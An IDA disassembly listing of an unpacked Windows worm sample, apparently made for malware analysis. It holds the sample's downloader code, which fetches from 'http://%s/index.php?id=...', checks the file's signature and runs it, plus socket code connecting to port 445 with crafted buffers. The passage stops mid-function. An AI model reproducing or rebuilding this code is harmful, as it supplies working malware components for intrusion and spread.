;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 29D969A15E81ED59CFB81DDC64F4CE18
; File Name : u:\work\29d969a15e81ed59cfb81ddc64f4ce18_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
push edi
